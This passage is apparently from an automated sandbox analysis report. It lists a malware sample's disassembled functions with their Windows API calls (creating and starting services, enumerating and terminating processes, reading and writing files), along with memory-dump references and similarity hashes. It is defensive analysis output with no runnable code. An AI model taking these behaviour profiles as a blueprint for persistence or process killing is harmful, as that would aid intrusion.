                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$CloseHandleSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2193747199-0
                                                                                                                                                                                                            • Opcode ID: 4b8893c0aebf7913d2779d052911446eda635433a7387e4f3cc0c068bfaa9c16
                                                                                                                                                                                                            • Instruction ID: be10187cfa2a3223c39ba84b81cac73f50791c0244182be0abf5d40a8fa663fa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b8893c0aebf7913d2779d052911446eda635433a7387e4f3cc0c068bfaa9c16
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E16135B0A00301DFD301AF24FC89B253FB8F799351B454619E85157EB5DB708AE4CB96

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00150500 Relevance: 13.7, APIs: 9, Instructions: 170serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
                                                                                                                                                                                                            • CreateServiceA.ADVAPI32(00000000,0113E608,0113E608,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
                                                                                                                                                                                                            • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 001506A7
                                                                                                                                                                                                            • OpenServiceA.ADVAPI32(00000000,0113E608,00000010), ref: 001506EB
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015072D
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0015073E
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 001507A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3525021261-0
                                                                                                                                                                                                            • Opcode ID: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
                                                                                                                                                                                                            • Instruction ID: ff063a97b803de87bef5ecaa9953c4dd416f2eb688c892f462b62d6c0cfe8f4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D610131A01314EFD3069F60FC8AB253FB4FB88B11F518605E842AAEB4E77496E5CB45
                                                                                                                                                                                                            Function 0014AF20 Relevance: 7.9, APIs: 5, Instructions: 385serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 0014B0AA
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 0014B15A
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0014B17A
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 0014B216
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0014B41C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1579346331-0
                                                                                                                                                                                                            • Opcode ID: 2f3bef2db8e794f34a2e304e0a6023eb5335007f1e9ab96ad1206d913d936871
                                                                                                                                                                                                            • Instruction ID: a0f2b06d3ada50d015d75a2ad3a634f7f9534579d36afb4ae1e502eb1c4fd254
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f3bef2db8e794f34a2e304e0a6023eb5335007f1e9ab96ad1206d913d936871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F143B2A05201EFC304DF64FCC9A6A3BB1FB94350B15421AE54697EB5E730DAE4CB81
                                                                                                                                                                                                            Function 00154380 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 387processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001544A7
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 001545C2
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 001547CE
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00154842
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0000000A), ref: 0015495A
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 001549AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00154A20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
                                                                                                                                                                                                            • String ID: Eln_
                                                                                                                                                                                                            • API String ID: 930127669-3437842203
                                                                                                                                                                                                            • Opcode ID: 6d8320fa28f0d2aaff4a95890231cf9e715981bcf6a58efcc56d29fb527cfcdc
                                                                                                                                                                                                            • Instruction ID: b7f0551deb72147bec76d60c7128754b5d8e8aecf9e3f1e2f017552fc06afc34
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d8320fa28f0d2aaff4a95890231cf9e715981bcf6a58efcc56d29fb527cfcdc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55F16771A00601DFD304CF25FC89A753BB5FB88315B51825AE84A87EB4EB748AE9CF51
                                                                                                                                                                                                            Function 0014CA40 Relevance: 10.8, APIs: 7, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0014CB20
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 0014CB5D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014CBBD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0014CC1D
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0014CED4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0014CF0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014CF47
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseCreateHandle$CountReadTickWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3478262135-0
                                                                                                                                                                                                            • Opcode ID: a2a1b766b654ab3d93827935dcd88c8090cf5561f183097baa27fed90573557b
                                                                                                                                                                                                            • Instruction ID: 22b809317a1e8f4ceabd0f7e90db9fa3d01592c38e56970ef6dbfb3cb24e9e0a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2a1b766b654ab3d93827935dcd88c8090cf5561f183097baa27fed90573557b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54E14671A01200EFD304EF24FD89A693BB5FB94710F11421AE9569BEF4EB308AD5CB95
                                                                                                                                                                                                            Function 0014BBC0 Relevance: 10.7, APIs: 7, Instructions: 205processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0014BCE3
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,00000000), ref: 0014BDDD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3397401024-0
                                                                                                                                                                                                            • Opcode ID: 43af716147c893c8216416e538511d6df22f3fec8a39ff57ade77b41a1f480e4
                                                                                                                                                                                                            • Instruction ID: 7a2530460fd01909547851a5077a9f467e3d0dd6411ff288c9576712f78708c7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43af716147c893c8216416e538511d6df22f3fec8a39ff57ade77b41a1f480e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B891FE75A04215DFC704DF24FCD6AAA3BB5FB98314B05815AE40693EB4EB349AD4CB40
                                                                                                                                                                                                            Function 00151530 Relevance: 9.2, APIs: 6, Instructions: 176filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001515C3
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 0015168A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 001516A7
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00151715
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00151774
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00151792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3236713533-0
                                                                                                                                                                                                            • Opcode ID: c790db70c0ad818271181fe7d940470d40b1c58603dba8fb8f25ca032381e17d
                                                                                                                                                                                                            • Instruction ID: 7cea0b3704c3af19e84f17581c6bd26a002671af38bbf90a46284e20a9b8cb3f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c790db70c0ad818271181fe7d940470d40b1c58603dba8fb8f25ca032381e17d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24712031A01304EFC701DFA9FC85A757BB4FB88710B61465AE44592EB4E77489E4CF81
                                                                                                                                                                                                            Function 0014BD08 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,00000000), ref: 0014BDDD
                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0014BE24
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0014BE68
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0014BF01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014BF2F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: 5ba676787640153d2252fcbb025fb90852a26ef8373a16aedf42bdc60a562f5c
                                                                                                                                                                                                            • Instruction ID: ccb021a07620769e6defeb3c3bf0685f2b768490c4ec524bc0fb80500a692929
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ba676787640153d2252fcbb025fb90852a26ef8373a16aedf42bdc60a562f5c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD51FE75A01315DFC708DF24FCD5AAA3BF5FB98329B05825AE50597AB0EB348AD0CB40
                                                                                                                                                                                                            Function 00175440 Relevance: 7.6, APIs: 5, Instructions: 71synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0015E92E,0015CA40,00000000,?), ref: 001754B2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 001754E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,0015E92E,0015CA40,00000000,?), ref: 0017551D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 00175538
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 0017554B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1404307249-0
                                                                                                                                                                                                            • Opcode ID: 74c2ad7216397147a5393ea55bd6ad1447b18c4dd5cf088603c679d8f1950da1
                                                                                                                                                                                                            • Instruction ID: 694a498d2173d1225c7d47ecbbef0716c760df5f3367694ff5c9aa56facf8e8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74c2ad7216397147a5393ea55bd6ad1447b18c4dd5cf088603c679d8f1950da1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED318931601305EBD3289F64FC89B227BB6FB48711F50821AE5469BEB0E77086D0CB91
                                                                                                                                                                                                            Function 00151860 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 001519BA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ServiceStatus
                                                                                                                                                                                                            • String ID: uRh
                                                                                                                                                                                                            • API String ID: 3969395364-64653548
                                                                                                                                                                                                            • Opcode ID: 2c8cd3d8f5839c0de9f0ebf9f0579bd21492590be531aa7e20a790c2fe380a0f
                                                                                                                                                                                                            • Instruction ID: ebb5af3c7ddb6819f865183d911c89f0e80dbb817fb0338720aabf1215abcb95
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c8cd3d8f5839c0de9f0ebf9f0579bd21492590be531aa7e20a790c2fe380a0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 523122B2600205EFC349DF64FC8A8213BB9F798356345821AE9468BE70D734D6E5CF51
                                                                                                                                                                                                            Function 0014D000 Relevance: 6.3, APIs: 4, Instructions: 269fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0014D11A
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 0014D1CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0014D3EE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0014D2E9
                                                                                                                                                                                                              • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(00150D8E,?,00150D8E,00000128,00000000), ref: 0016FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
